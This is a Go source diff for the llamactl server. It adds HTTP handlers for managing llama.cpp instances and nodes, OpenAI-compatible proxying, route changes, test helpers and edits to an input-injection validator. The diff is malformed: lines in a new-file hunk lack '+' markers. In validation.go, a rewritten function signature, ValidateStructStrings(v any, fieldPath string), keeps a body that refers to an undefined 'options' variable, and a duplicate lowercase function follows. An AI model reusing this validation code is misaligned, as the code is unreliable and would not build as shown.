 		writeJSON(w, http.StatusOK, options)
 	}
 }
 // executeLlamaServerCommand returns a handler that runs `llama-server <flag>` and
 // writes its combined stdout/stderr as plain text. When the command fails, a 500
 // JSON error is written whose details are errorMsg followed by the error text.
 func (h *Handler) executeLlamaServerCommand(flag, errorMsg string) http.HandlerFunc {
 	return func(w http.ResponseWriter, r *http.Request) {
 		// Bind the child process to the request context so it is killed if the
 		// client disconnects or the request is cancelled, instead of lingering.
 		cmd := exec.CommandContext(r.Context(), "llama-server", flag)
 		output, err := cmd.CombinedOutput()
 		if err != nil {
 			writeError(w, http.StatusInternalServerError, "command failed", errorMsg+": "+err.Error())
 			return
 		}
 		writeText(w, http.StatusOK, string(output))
 	}
 }
 // LlamaServerHelpHandler godoc
 // @Summary Get help for llama server
 // @Description Returns the help text for the llama server command
 // @Tags Backends
 // @Security ApiKeyAuth
 // @Produces text/plain
 // @Success 200 {string} string "Help text"
 // @Failure 500 {string} string "Internal Server Error"
 // @Router /api/v1/backends/llama-cpp/help [get]
 func (h *Handler) LlamaServerHelpHandler() http.HandlerFunc {
 	// Delegates to the shared command runner, i.e. `llama-server --help`.
 	return h.executeLlamaServerCommand("--help", "Failed to get help")
 }
 // LlamaServerVersionHandler godoc
 // @Summary Get version of llama server
 // @Description Returns the version of the llama server command
 // @Tags Backends
 // @Security ApiKeyAuth
 // @Produces text/plain
 // @Success 200 {string} string "Version information"
 // @Failure 500 {string} string "Internal Server Error"
 // @Router /api/v1/backends/llama-cpp/version [get]
 func (h *Handler) LlamaServerVersionHandler() http.HandlerFunc {
 	// Delegates to the shared command runner, i.e. `llama-server --version`.
 	return h.executeLlamaServerCommand("--version", "Failed to get version")
 }
 // LlamaServerListDevicesHandler godoc
 // @Summary List available devices for llama server
 // @Description Returns a list of available devices for the llama server
 // @Tags Backends
 // @Security ApiKeyAuth
 // @Produces text/plain
 // @Success 200 {string} string "List of devices"
 // @Failure 500 {string} string "Internal Server Error"
 // @Router /api/v1/backends/llama-cpp/devices [get]
 func (h *Handler) LlamaServerListDevicesHandler() http.HandlerFunc {
 	// Delegates to the shared command runner, i.e. `llama-server --list-devices`.
 	return h.executeLlamaServerCommand("--list-devices", "Failed to list devices")
 }
--- a/pkg/server/handlers_instances.go
+++ b/pkg/server/handlers_instances.go
@@ -0,0 +1,353 @@
 package server
 import (
 	"encoding/json"
 	"fmt"
 	"llamactl/pkg/instance"
 	"llamactl/pkg/manager"
 	"llamactl/pkg/validation"
 	"net/http"
 	"strconv"
 	"strings"
 	"github.com/go-chi/chi/v5"
 )
 // ListInstances godoc
 // @Summary List all instances
 // @Description Returns a list of all instances managed by the server
 // @Tags Instances
 // @Security ApiKeyAuth
 // @Produces json
 // @Success 200 {array} instance.Instance "List of instances"
 // @Failure 500 {string} string "Internal Server Error"
 // @Router /api/v1/instances [get]
 func (h *Handler) ListInstances() http.HandlerFunc {
 	return func(w http.ResponseWriter, r *http.Request) {
 		all, listErr := h.InstanceManager.ListInstances()
 		if listErr == nil {
 			// Success path: return the manager's list as-is.
 			writeJSON(w, http.StatusOK, all)
 			return
 		}
 		writeError(w, http.StatusInternalServerError, "list_failed", "Failed to list instances: "+listErr.Error())
 	}
 }
 // CreateInstance godoc
 // @Summary Create and start a new instance
 // @Description Creates a new instance with the provided configuration options
 // @Tags Instances
 // @Security ApiKeyAuth
 // @Accept json
 // @Produces json
 // @Param name path string true "Instance Name"
 // @Param options body instance.Options true "Instance configuration options"
 // @Success 201 {object} instance.Instance "Created instance details"
 // @Failure 400 {string} string "Invalid request body"
 // @Failure 500 {string} string "Internal Server Error"
 // @Router /api/v1/instances/{name} [post]
 func (h *Handler) CreateInstance() http.HandlerFunc {
 	return func(w http.ResponseWriter, r *http.Request) {
 		// The instance name comes from the URL and must pass validation first.
 		instanceName, nameErr := validation.ValidateInstanceName(chi.URLParam(r, "name"))
 		if nameErr != nil {
 			writeError(w, http.StatusBadRequest, "invalid_instance_name", nameErr.Error())
 			return
 		}
 		// The request body holds the instance options as JSON.
 		opts := new(instance.Options)
 		if decodeErr := json.NewDecoder(r.Body).Decode(opts); decodeErr != nil {
 			writeError(w, http.StatusBadRequest, "invalid_request", "Invalid request body")
 			return
 		}
 		created, createErr := h.InstanceManager.CreateInstance(instanceName, opts)
 		if createErr != nil {
 			writeError(w, http.StatusInternalServerError, "create_failed", "Failed to create instance: "+createErr.Error())
 			return
 		}
 		writeJSON(w, http.StatusCreated, created)
 	}
 }
 // GetInstance godoc
 // @Summary Get details of a specific instance
 // @Description Returns the details of a specific instance by name
 // @Tags Instances
 // @Security ApiKeyAuth
 // @Produces json
 // @Param name path string true "Instance Name"
 // @Success 200 {object} instance.Instance "Instance details"
 // @Failure 400 {string} string "Invalid name format"
 // @Failure 500 {string} string "Internal Server Error"
 // @Router /api/v1/instances/{name} [get]
 func (h *Handler) GetInstance() http.HandlerFunc {
 	return func(w http.ResponseWriter, r *http.Request) {
 		instanceName, nameErr := validation.ValidateInstanceName(chi.URLParam(r, "name"))
 		if nameErr != nil {
 			writeError(w, http.StatusBadRequest, "invalid_instance_name", nameErr.Error())
 			return
 		}
 		// Lookup failures are reported to the client as a 400 response.
 		found, lookupErr := h.InstanceManager.GetInstance(instanceName)
 		if lookupErr != nil {
 			writeError(w, http.StatusBadRequest, "invalid_instance", lookupErr.Error())
 			return
 		}
 		writeJSON(w, http.StatusOK, found)
 	}
 }
 // UpdateInstance godoc
 // @Summary Update an instance's configuration
 // @Description Updates the configuration of a specific instance by name
 // @Tags Instances
 // @Security ApiKeyAuth
 // @Accept json
 // @Produces json
 // @Param name path string true "Instance Name"
 // @Param options body instance.Options true "Instance configuration options"
 // @Success 200 {object} instance.Instance "Updated instance details"
 // @Failure 400 {string} string "Invalid name format"
 // @Failure 500 {string} string "Internal Server Error"
 // @Router /api/v1/instances/{name} [put]
 func (h *Handler) UpdateInstance() http.HandlerFunc {
 	return func(w http.ResponseWriter, r *http.Request) {
 		// The instance name comes from the URL and must pass validation first.
 		instanceName, nameErr := validation.ValidateInstanceName(chi.URLParam(r, "name"))
 		if nameErr != nil {
 			writeError(w, http.StatusBadRequest, "invalid_instance_name", nameErr.Error())
 			return
 		}
 		// The request body holds the replacement options as JSON.
 		opts := new(instance.Options)
 		if decodeErr := json.NewDecoder(r.Body).Decode(opts); decodeErr != nil {
 			writeError(w, http.StatusBadRequest, "invalid_request", "Invalid request body")
 			return
 		}
 		updated, updateErr := h.InstanceManager.UpdateInstance(instanceName, opts)
 		if updateErr != nil {
 			writeError(w, http.StatusInternalServerError, "update_failed", "Failed to update instance: "+updateErr.Error())
 			return
 		}
 		writeJSON(w, http.StatusOK, updated)
 	}
 }
 // StartInstance godoc
 // @Summary Start a stopped instance
 // @Description Starts a specific instance by name
 // @Tags Instances
 // @Security ApiKeyAuth
 // @Produces json
 // @Param name path string true "Instance Name"
 // @Success 200 {object} instance.Instance "Started instance details"
 // @Failure 400 {string} string "Invalid name format"
 // @Failure 500 {string} string "Internal Server Error"
 // @Router /api/v1/instances/{name}/start [post]
 func (h *Handler) StartInstance() http.HandlerFunc {
 	return func(w http.ResponseWriter, r *http.Request) {
 		instanceName, nameErr := validation.ValidateInstanceName(chi.URLParam(r, "name"))
 		if nameErr != nil {
 			writeError(w, http.StatusBadRequest, "invalid_instance_name", nameErr.Error())
 			return
 		}
 		started, startErr := h.InstanceManager.StartInstance(instanceName)
 		// Dispatch on the error's dynamic type: no error, the running-instance
 		// limit (409 Conflict), or any other failure (500).
 		switch startErr.(type) {
 		case nil:
 			writeJSON(w, http.StatusOK, started)
 		case manager.MaxRunningInstancesError:
 			writeError(w, http.StatusConflict, "max_instances_reached", startErr.Error())
 		default:
 			writeError(w, http.StatusInternalServerError, "start_failed", "Failed to start instance: "+startErr.Error())
 		}
 	}
 }
 // StopInstance godoc
 // @Summary Stop a running instance
 // @Description Stops a specific instance by name
 // @Tags Instances
 // @Security ApiKeyAuth
 // @Produces json
 // @Param name path string true "Instance Name"
 // @Success 200 {object} instance.Instance "Stopped instance details"
 // @Failure 400 {string} string "Invalid name format"
 // @Failure 500 {string} string "Internal Server Error"
 // @Router /api/v1/instances/{name}/stop [post]
 func (h *Handler) StopInstance() http.HandlerFunc {
 	return func(w http.ResponseWriter, r *http.Request) {
 		instanceName, nameErr := validation.ValidateInstanceName(chi.URLParam(r, "name"))
 		if nameErr != nil {
 			writeError(w, http.StatusBadRequest, "invalid_instance_name", nameErr.Error())
 			return
 		}
 		// On success the manager returns the instance, which is echoed as JSON.
 		stopped, stopErr := h.InstanceManager.StopInstance(instanceName)
 		if stopErr != nil {
 			writeError(w, http.StatusInternalServerError, "stop_failed", "Failed to stop instance: "+stopErr.Error())
 			return
 		}
 		writeJSON(w, http.StatusOK, stopped)
 	}
 }
 // RestartInstance godoc
 // @Summary Restart a running instance
 // @Description Restarts a specific instance by name
 // @Tags Instances
 // @Security ApiKeyAuth
 // @Produces json
 // @Param name path string true "Instance Name"
 // @Success 200 {object} instance.Instance "Restarted instance details"
 // @Failure 400 {string} string "Invalid name format"
 // @Failure 500 {string} string "Internal Server Error"
 // @Router /api/v1/instances/{name}/restart [post]
 func (h *Handler) RestartInstance() http.HandlerFunc {
 	return func(w http.ResponseWriter, r *http.Request) {
 		instanceName, nameErr := validation.ValidateInstanceName(chi.URLParam(r, "name"))
 		if nameErr != nil {
 			writeError(w, http.StatusBadRequest, "invalid_instance_name", nameErr.Error())
 			return
 		}
 		// On success the manager returns the instance, which is echoed as JSON.
 		restarted, restartErr := h.InstanceManager.RestartInstance(instanceName)
 		if restartErr != nil {
 			writeError(w, http.StatusInternalServerError, "restart_failed", "Failed to restart instance: "+restartErr.Error())
 			return
 		}
 		writeJSON(w, http.StatusOK, restarted)
 	}
 }
 // DeleteInstance godoc
 // @Summary Delete an instance
 // @Description Stops and removes a specific instance by name
 // @Tags Instances
 // @Security ApiKeyAuth
 // @Param name path string true "Instance Name"
 // @Success 204 "No Content"
 // @Failure 400 {string} string "Invalid name format"
 // @Failure 500 {string} string "Internal Server Error"
 // @Router /api/v1/instances/{name} [delete]
 func (h *Handler) DeleteInstance() http.HandlerFunc {
 	return func(w http.ResponseWriter, r *http.Request) {
 		instanceName, nameErr := validation.ValidateInstanceName(chi.URLParam(r, "name"))
 		if nameErr != nil {
 			writeError(w, http.StatusBadRequest, "invalid_instance_name", nameErr.Error())
 			return
 		}
 		deleteErr := h.InstanceManager.DeleteInstance(instanceName)
 		if deleteErr != nil {
 			writeError(w, http.StatusInternalServerError, "delete_failed", "Failed to delete instance: "+deleteErr.Error())
 			return
 		}
 		// Successful deletion has no response body.
 		w.WriteHeader(http.StatusNoContent)
 	}
 }
 // GetInstanceLogs godoc
 // @Summary Get logs from a specific instance
 // @Description Returns the logs from a specific instance by name with optional line limit
 // @Tags Instances
 // @Security ApiKeyAuth
 // @Param name path string true "Instance Name"
 // @Param lines query string false "Number of lines to retrieve (default: all lines)"
 // @Produces text/plain
 // @Success 200 {string} string "Instance logs"
 // @Failure 400 {string} string "Invalid name format or lines parameter"
 // @Failure 500 {string} string "Internal Server Error"
 // @Router /api/v1/instances/{name}/logs [get]
 func (h *Handler) GetInstanceLogs() http.HandlerFunc {
 	return func(w http.ResponseWriter, r *http.Request) {
 		instanceName, nameErr := validation.ValidateInstanceName(chi.URLParam(r, "name"))
 		if nameErr != nil {
 			writeError(w, http.StatusBadRequest, "invalid_instance_name", nameErr.Error())
 			return
 		}
 		// -1 requests every line; an explicit "lines" query value overrides it.
 		lineCount := -1
 		if rawLines := r.URL.Query().Get("lines"); rawLines != "" {
 			requested, convErr := strconv.Atoi(rawLines)
 			if convErr != nil {
 				writeError(w, http.StatusBadRequest, "invalid_parameter", "Invalid lines parameter: "+convErr.Error())
 				return
 			}
 			lineCount = requested
 		}
 		// Log retrieval is delegated to the instance manager.
 		content, logsErr := h.InstanceManager.GetInstanceLogs(instanceName, lineCount)
 		if logsErr != nil {
 			writeError(w, http.StatusInternalServerError, "logs_failed", "Failed to get logs: "+logsErr.Error())
 			return
 		}
 		writeText(w, http.StatusOK, content)
 	}
 }
 // InstanceProxy godoc
 // @Summary Proxy requests to a specific instance, does not autostart instance if stopped
 // @Description Forwards HTTP requests to the llama-server instance running on a specific port
 // @Tags Instances
 // @Security ApiKeyAuth
 // @Param name path string true "Instance Name"
 // @Success 200 "Request successfully proxied to instance"
 // @Failure 400 {string} string "Invalid name format"
 // @Failure 500 {string} string "Internal Server Error"
 // @Failure 503 {string} string "Instance is not running"
 // @Router /api/v1/instances/{name}/proxy [get]
 // @Router /api/v1/instances/{name}/proxy [post]
 func (h *Handler) InstanceProxy() http.HandlerFunc {
 	return func(w http.ResponseWriter, r *http.Request) {
 		inst, err := h.getInstance(r)
 		if err != nil {
 			writeError(w, http.StatusBadRequest, "invalid_instance", err.Error())
 			return
 		}
 		// This endpoint never starts an instance; a stopped one yields 503.
 		if !inst.IsRunning() {
 			writeError(w, http.StatusServiceUnavailable, "instance_not_running", "Instance is not running")
 			return
 		}
 		proxy, err := inst.GetProxy()
 		if err != nil {
 			writeError(w, http.StatusInternalServerError, "proxy_failed", "Failed to get proxy: "+err.Error())
 			return
 		}
 		if !inst.IsRemote() {
 			// Strip the "/api/v1/instances/<name>/proxy" prefix from the request URL
 			prefix := fmt.Sprintf("/api/v1/instances/%s/proxy", inst.Name)
 			r.URL.Path = strings.TrimPrefix(r.URL.Path, prefix)
 		}
 		// Set forwarded headers. For incoming server requests net/http promotes the
 		// Host header to r.Host and removes it from r.Header, so reading it from the
 		// header map would always forward an empty value.
 		r.Header.Set("X-Forwarded-Host", r.Host)
 		// Report the scheme the client actually used on this connection.
 		forwardedProto := "http"
 		if r.TLS != nil {
 			forwardedProto = "https"
 		}
 		r.Header.Set("X-Forwarded-Proto", forwardedProto)
 		proxy.ServeHTTP(w, r)
 	}
 }
--- a/pkg/server/handlers_nodes.go
+++ b/pkg/server/handlers_nodes.go
@@ -0,0 +1,70 @@
 package server
 import (
 	"net/http"
 	"github.com/go-chi/chi/v5"
 )
 // NodeResponse is the API representation of a configured node. The node
 // handlers populate only Address from the node configuration.
 type NodeResponse struct {
 	Address string `json:"address"`
 }
 // ListNodes godoc
 // @Summary List all configured nodes
 // @Description Returns a map of all nodes configured in the server (node name -> node config)
 // @Tags Nodes
 // @Security ApiKeyAuth
 // @Produces json
 // @Success 200 {object} map[string]NodeResponse "Map of nodes"
 // @Failure 500 {string} string "Internal Server Error"
 // @Router /api/v1/nodes [get]
 func (h *Handler) ListNodes() http.HandlerFunc {
 	return func(w http.ResponseWriter, r *http.Request) {
 		// Build a name -> NodeResponse map carrying only each node's address.
 		configured := h.cfg.Nodes
 		sanitized := make(map[string]NodeResponse, len(configured))
 		for nodeName, nodeCfg := range configured {
 			sanitized[nodeName] = NodeResponse{Address: nodeCfg.Address}
 		}
 		writeJSON(w, http.StatusOK, sanitized)
 	}
 }
 // GetNode godoc
 // @Summary Get details of a specific node
 // @Description Returns the details of a specific node by name
 // @Tags Nodes
 // @Security ApiKeyAuth
 // @Produces json
 // @Param name path string true "Node Name"
 // @Success 200 {object} NodeResponse "Node details"
 // @Failure 400 {string} string "Invalid name format"
 // @Failure 404 {string} string "Node not found"
 // @Failure 500 {string} string "Internal Server Error"
 // @Router /api/v1/nodes/{name} [get]
 func (h *Handler) GetNode() http.HandlerFunc {
 	return func(w http.ResponseWriter, r *http.Request) {
 		nodeName := chi.URLParam(r, "name")
 		if len(nodeName) == 0 {
 			writeError(w, http.StatusBadRequest, "invalid_request", "Node name cannot be empty")
 			return
 		}
 		nodeCfg, found := h.cfg.Nodes[nodeName]
 		if !found {
 			writeError(w, http.StatusNotFound, "not_found", "Node not found")
 			return
 		}
 		// Only the address is copied into the response.
 		writeJSON(w, http.StatusOK, NodeResponse{Address: nodeCfg.Address})
 	}
 }
--- a/pkg/server/handlers_openai.go
+++ b/pkg/server/handlers_openai.go
@@ -0,0 +1,129 @@
 package server
 import (
 	"bytes"
 	"encoding/json"
 	"io"
 	"llamactl/pkg/validation"
 	"net/http"
 )
 // OpenAIListInstancesResponse represents the response structure for listing instances (models) in OpenAI-compatible format
 type OpenAIListInstancesResponse struct {
 	// Object is the object type of the envelope; OpenAIListInstances sets it to "list"
 	Object string           `json:"object"`
 	// Data holds one OpenAIInstance per listed instance
 	Data   []OpenAIInstance `json:"data"`
 }
 // OpenAIInstance represents a single instance (model) in OpenAI-compatible format
 type OpenAIInstance struct {
 	// ID is the identifier clients use as the model name; OpenAIListInstances fills it with the instance name
 	ID      string `json:"id"`
 	// Object is the object type of the entry; OpenAIListInstances sets it to "model"
 	Object  string `json:"object"`
 	// Created is copied from the instance's Created value (presumably a Unix timestamp; confirm against the instance type)
 	Created int64  `json:"created"`
 	// OwnedBy names the owner of the model; OpenAIListInstances sets it to "llamactl"
 	OwnedBy string `json:"owned_by"`
 }
 // OpenAIListInstances godoc
 // @Summary List instances in OpenAI-compatible format
 // @Description Returns a list of instances in a format compatible with OpenAI API
 // @Tags OpenAI
 // @Security ApiKeyAuth
 // @Produce json
 // @Success 200 {object} OpenAIListInstancesResponse "List of OpenAI-compatible instances"
 // @Failure 500 {string} string "Internal Server Error"
 // @Router /v1/models [get]
 func (h *Handler) OpenAIListInstances() http.HandlerFunc {
 	return func(w http.ResponseWriter, r *http.Request) {
 		instances, err := h.InstanceManager.ListInstances()
 		if err != nil {
 			writeError(w, http.StatusInternalServerError, "list_failed", "Failed to list instances: "+err.Error())
 			return
 		}
 		// Pre-sized (and therefore non-nil) slice: one OpenAI "model" entry per instance
 		openaiInstances := make([]OpenAIInstance, len(instances))
 		for i, inst := range instances {
 			openaiInstances[i] = OpenAIInstance{
 				ID:      inst.Name,
 				Object:  "model",
 				Created: inst.Created,
 				OwnedBy: "llamactl",
 			}
 		}
 		// Wrap the entries in the "list" envelope
 		writeJSON(w, http.StatusOK, OpenAIListInstancesResponse{
 			Object: "list",
 			Data:   openaiInstances,
 		})
 	}
 }
 // OpenAIProxy godoc
 // @Summary OpenAI-compatible proxy endpoint
 // @Description Handles all POST requests to /v1/*, routing to the appropriate instance based on the request body. Requires API key authentication via the `Authorization` header.
 // @Tags OpenAI
 // @Security ApiKeyAuth
 // @Accept json
 // @Produce json
 // @Success 200 "OpenAI response"
 // @Failure 400 {string} string "Invalid request body or instance name"
 // @Failure 500 {string} string "Internal Server Error"
 // @Router /v1/ [post]
 func (h *Handler) OpenAIProxy() http.HandlerFunc {
 	return func(w http.ResponseWriter, r *http.Request) {
 		// Read the entire body first: its "model" field selects the target instance.
 		// NOTE(review): the read is unbounded; consider http.MaxBytesReader if
 		// untrusted clients can reach this endpoint.
 		bodyBytes, err := io.ReadAll(r.Body)
 		if err != nil {
 			writeError(w, http.StatusBadRequest, "invalid_request", "Failed to read request body")
 			return
 		}
 		r.Body.Close()
 		// Parse the body to extract instance name
 		var requestBody map[string]any
 		if err := json.Unmarshal(bodyBytes, &requestBody); err != nil {
 			writeError(w, http.StatusBadRequest, "invalid_request", "Invalid request body")
 			return
 		}
 		// A missing, non-string or empty "model" value is rejected
 		modelName, ok := requestBody["model"].(string)
 		if !ok || modelName == "" {
 			writeError(w, http.StatusBadRequest, "invalid_request", "Instance name is required")
 			return
 		}
 		// Validate instance name at the entry point
 		validatedName, err := validation.ValidateInstanceName(modelName)
 		if err != nil {
 			writeError(w, http.StatusBadRequest, "invalid_instance_name", err.Error())
 			return
 		}
 		// Route to the appropriate instance based on instance name
 		inst, err := h.InstanceManager.GetInstance(validatedName)
 		if err != nil {
 			writeError(w, http.StatusBadRequest, "invalid_instance", err.Error())
 			return
 		}
 		// Only local instances that are not running go through ensureInstanceRunning
 		if !inst.IsRemote() && !inst.IsRunning() {
 			if err := h.ensureInstanceRunning(inst); err != nil {
 				writeError(w, http.StatusInternalServerError, "instance_start_failed", err.Error())
 				return
 			}
 		}
 		proxy, err := inst.GetProxy()
 		if err != nil {
 			writeError(w, http.StatusInternalServerError, "proxy_failed", err.Error())
 			return
 		}
 		// Recreate the request body from the bytes we read, since the original
 		// reader has been consumed, and keep ContentLength in step with it
 		r.Body = io.NopCloser(bytes.NewReader(bodyBytes))
 		r.ContentLength = int64(len(bodyBytes))
 		proxy.ServeHTTP(w, r)
 	}
 }
--- a/pkg/server/handlers_system.go
+++ b/pkg/server/handlers_system.go
@@ -0,0 +1,22 @@
 package server
 import (
 	"fmt"
 	"net/http"
 )
 // VersionHandler godoc
 // @Summary Get llamactl version
 // @Description Returns the version of the llamactl command
 // @Tags System
 // @Security ApiKeyAuth
 // @Produce text/plain
 // @Success 200 {string} string "Version information"
 // @Failure 500 {string} string "Internal Server Error"
 // @Router /api/v1/version [get]
 func (h *Handler) VersionHandler() http.HandlerFunc {
 	return func(w http.ResponseWriter, r *http.Request) {
 		// Three "Label: value" lines built from the handler configuration on each request
 		versionInfo := fmt.Sprintf(
 			"Version: %s\nCommit: %s\nBuild Time: %s\n",
 			h.cfg.Version, h.cfg.CommitHash, h.cfg.BuildTime,
 		)
 		writeText(w, http.StatusOK, versionInfo)
 	}
 }
--- a/pkg/server/openai.go
+++ b/pkg/server/openai.go
@@ -1,13 +0,0 @@
 package server
 // OpenAIListInstancesResponse is the envelope for a list of OpenAIInstance values,
 // serialized with the JSON keys "object" and "data"
 type OpenAIListInstancesResponse struct {
 	Object string           `json:"object"`
 	Data   []OpenAIInstance `json:"data"`
 }
 // OpenAIInstance is a single entry of OpenAIListInstancesResponse, serialized with
 // the JSON keys "id", "object", "created" and "owned_by"
 type OpenAIInstance struct {
 	ID      string `json:"id"`
 	Object  string `json:"object"`
 	Created int64  `json:"created"`
 	OwnedBy string `json:"owned_by"`
 }
--- a/pkg/server/routes.go
+++ b/pkg/server/routes.go
@@ -8,7 +8,7 @@ import (
 	"github.com/go-chi/cors"
 	httpSwagger "github.com/swaggo/http-swagger"
-	_ "llamactl/apidocs"
+	_ "llamactl/docs"
 	"llamactl/webui"
 )
@@ -20,7 +20,7 @@ func SetupRouter(handler *Handler) *chi.Mux {
 	r.Use(cors.Handler(cors.Options{
 		AllowedOrigins:   handler.cfg.Server.AllowedOrigins,
 		AllowedMethods:   []string{"GET", "POST", "PUT", "DELETE", "OPTIONS"},
-		AllowedHeaders:   []string{"Accept", "Authorization", "Content-Type", "X-CSRF-Token"},
+		AllowedHeaders:   handler.cfg.Server.AllowedHeaders,
 		ExposedHeaders:   []string{"Link"},
 		AllowCredentials: false,
 		MaxAge:           300,
@@ -60,6 +60,15 @@ func SetupRouter(handler *Handler) *chi.Mux {
 			})
 		})
 		// Node management endpoints
 		r.Route("/nodes", func(r chi.Router) {
 			r.Get("/", handler.ListNodes()) // List all nodes
 			r.Route("/{name}", func(r chi.Router) {
 				r.Get("/", handler.GetNode())
 			})
 		})
 		// Instance management endpoints
 		r.Route("/instances", func(r chi.Router) {
 			r.Get("/", handler.ListInstances()) // List all instances
@@ -77,7 +86,7 @@ func SetupRouter(handler *Handler) *chi.Mux {
 				// Llama.cpp server proxy endpoints (proxied to the actual llama.cpp server)
 				r.Route("/proxy", func(r chi.Router) {
-					r.HandleFunc("/*", handler.ProxyToInstance()) // Proxy all llama.cpp server requests
+					r.HandleFunc("/*", handler.InstanceProxy()) // Proxy all llama.cpp server requests
 				})
 			})
 		})
@@ -103,6 +112,51 @@ func SetupRouter(handler *Handler) *chi.Mux {
 	})
 	r.Route("/llama-cpp/{name}", func(r chi.Router) {
 		// Public Routes
 		// Allow llama-cpp server to serve its own WebUI if it is running.
 		// Don't auto start the server since it can be accessed without an API key
 		r.Get("/", handler.LlamaCppUIProxy())
 		// Private Routes
 		r.Group(func(r chi.Router) {
 			if authMiddleware != nil && handler.cfg.Auth.RequireInferenceAuth {
 				r.Use(authMiddleware.AuthMiddleware(KeyTypeInference))
 			}
 			// This handler auto-starts the server if it's not running
 			llamaCppHandler := handler.LlamaCppProxy()
 			// llama.cpp server specific proxy endpoints
 			r.Get("/props", llamaCppHandler)
 			// /slots endpoint is secured (see: https://github.com/ggml-org/llama.cpp/pull/15630)
 			r.Get("/slots", llamaCppHandler)
 			r.Post("/apply-template", llamaCppHandler)
 			r.Post("/completion", llamaCppHandler)
 			r.Post("/detokenize", llamaCppHandler)
 			r.Post("/embeddings", llamaCppHandler)
 			r.Post("/infill", llamaCppHandler)
 			r.Post("/metrics", llamaCppHandler)
 			r.Post("/props", llamaCppHandler)
 			r.Post("/reranking", llamaCppHandler)
 			r.Post("/tokenize", llamaCppHandler)
 			// OpenAI-compatible proxy endpoint
 			// Handles all POST requests to /v1/*, including:
 			//   - /v1/completions
 			//   - /v1/chat/completions
 			//   - /v1/embeddings
 			//   - /v1/rerank
 			//   - /v1/reranking
 			// llamaCppHandler is used here because some users of llama.cpp endpoints depend
 			// on "model" field being optional, and handler.OpenAIProxy requires it.
 			r.Post("/v1/*", llamaCppHandler)
 		})
 	})
 	// Serve WebUI files
 	if err := webui.SetupWebUI(r); err != nil {
 		fmt.Printf("Failed to set up WebUI: %v\n", err)
--- a/pkg/testutil/helpers.go
+++ b/pkg/testutil/helpers.go
@@ -1,5 +1,7 @@
 package testutil
 import "slices"
 // Helper functions for pointer fields
 func BoolPtr(b bool) *bool {
 	return &b
@@ -8,3 +10,23 @@ func BoolPtr(b bool) *bool {
 // IntPtr returns a pointer to a newly allocated int holding the value of i
 func IntPtr(i int) *int {
 	ptr := new(int)
 	*ptr = i
 	return ptr
 }
 // Helper functions for testing command arguments
 // Contains reports whether item occurs anywhere in slice
 func Contains(slice []string, item string) bool {
 	return slices.Index(slice, item) >= 0
 }
 // ContainsFlagWithValue reports whether args holds flag immediately followed by value
 func ContainsFlagWithValue(args []string, flag, value string) bool {
 	// Stop one short of the end: a flag in the last position has no value after it
 	for pos := 0; pos+1 < len(args); pos++ {
 		if args[pos] == flag && args[pos+1] == value {
 			return true
 		}
 	}
 	return false
 }
--- a/pkg/validation/validation.go
+++ b/pkg/validation/validation.go
@@ -2,8 +2,6 @@ package validation
 import (
 	"fmt"
 	"llamactl/pkg/backends"
 	"llamactl/pkg/instance"
 	"reflect"
 	"regexp"
 )
@@ -24,8 +22,8 @@ var (
 type ValidationError error
-// validateStringForInjection checks if a string contains dangerous patterns
+// ValidateStringForInjection checks if a string contains dangerous patterns
-func validateStringForInjection(value string) error {
+func ValidateStringForInjection(value string) error {
 	for _, pattern := range dangerousPatterns {
 		if pattern.MatchString(value) {
 			return ValidationError(fmt.Errorf("value contains potentially dangerous characters: %s", value))
@@ -34,83 +32,8 @@ func validateStringForInjection(value string) error {
 	return nil
 }
-// ValidateInstanceOptions performs validation based on backend type
+// ValidateStructStrings recursively validates all string fields in a struct
-func ValidateInstanceOptions(options *instance.CreateInstanceOptions) error {
+func ValidateStructStrings(v any, fieldPath string) error {
 	if options == nil {
 		return ValidationError(fmt.Errorf("options cannot be nil"))
 	}
 	// Validate based on backend type
 	switch options.BackendType {
 	case backends.BackendTypeLlamaCpp:
 		return validateLlamaCppOptions(options)
 	case backends.BackendTypeMlxLm:
 		return validateMlxOptions(options)
 	case backends.BackendTypeVllm:
 		return validateVllmOptions(options)
 	default:
 		return ValidationError(fmt.Errorf("unsupported backend type: %s", options.BackendType))
 	}
 }
 // validateLlamaCppOptions checks the llama.cpp section of the instance options:
 // it must be present, its string fields must pass the injection scan, and its
 // port must lie within 0-65535
 func validateLlamaCppOptions(options *instance.CreateInstanceOptions) error {
 	serverOpts := options.LlamaServerOptions
 	if serverOpts == nil {
 		return ValidationError(fmt.Errorf("llama server options cannot be nil for llama.cpp backend"))
 	}
 	// Reflection-based scan of all string fields for injection patterns
 	if scanErr := validateStructStrings(serverOpts, ""); scanErr != nil {
 		return scanErr
 	}
 	// Basic network validation for port
 	if port := serverOpts.Port; port < 0 || port > 65535 {
 		return ValidationError(fmt.Errorf("invalid port range: %d", port))
 	}
 	return nil
 }
 // validateMlxOptions checks the MLX section of the instance options: it must be
 // present, its string fields must pass the injection scan, and its port must
 // lie within 0-65535
 func validateMlxOptions(options *instance.CreateInstanceOptions) error {
 	serverOpts := options.MlxServerOptions
 	if serverOpts == nil {
 		return ValidationError(fmt.Errorf("MLX server options cannot be nil for MLX backend"))
 	}
 	// Scan all string fields for injection patterns
 	if scanErr := validateStructStrings(serverOpts, ""); scanErr != nil {
 		return scanErr
 	}
 	// Basic network validation for port
 	if port := serverOpts.Port; port < 0 || port > 65535 {
 		return ValidationError(fmt.Errorf("invalid port range: %d", port))
 	}
 	return nil
 }
 // validateVllmOptions checks the vLLM section of the instance options: it must
 // be present, its string fields must pass the injection scan, and its port
 // must lie within 0-65535
 func validateVllmOptions(options *instance.CreateInstanceOptions) error {
 	serverOpts := options.VllmServerOptions
 	if serverOpts == nil {
 		return ValidationError(fmt.Errorf("vLLM server options cannot be nil for vLLM backend"))
 	}
 	// Reflection-based scan of all string fields for injection patterns
 	if scanErr := validateStructStrings(serverOpts, ""); scanErr != nil {
 		return scanErr
 	}
 	// Basic network validation for port
 	if port := serverOpts.Port; port < 0 || port > 65535 {
 		return ValidationError(fmt.Errorf("invalid port range: %d", port))
 	}
 	return nil
 }
 // validateStructStrings recursively validates all string fields in a struct
 func validateStructStrings(v any, fieldPath string) error {
 	val := reflect.ValueOf(v)
 	if val.Kind() == reflect.Ptr {
 		val = val.Elem()
@@ -136,21 +59,21 @@ func validateStructStrings(v any, fieldPath string) error {
 		switch field.Kind() {
 		case reflect.String:
-			if err := validateStringForInjection(field.String()); err != nil {
+			if err := ValidateStringForInjection(field.String()); err != nil {
 				return ValidationError(fmt.Errorf("field %s: %w", fieldName, err))
 			}
 		case reflect.Slice:
 			if field.Type().Elem().Kind() == reflect.String {
 				for j := 0; j < field.Len(); j++ {
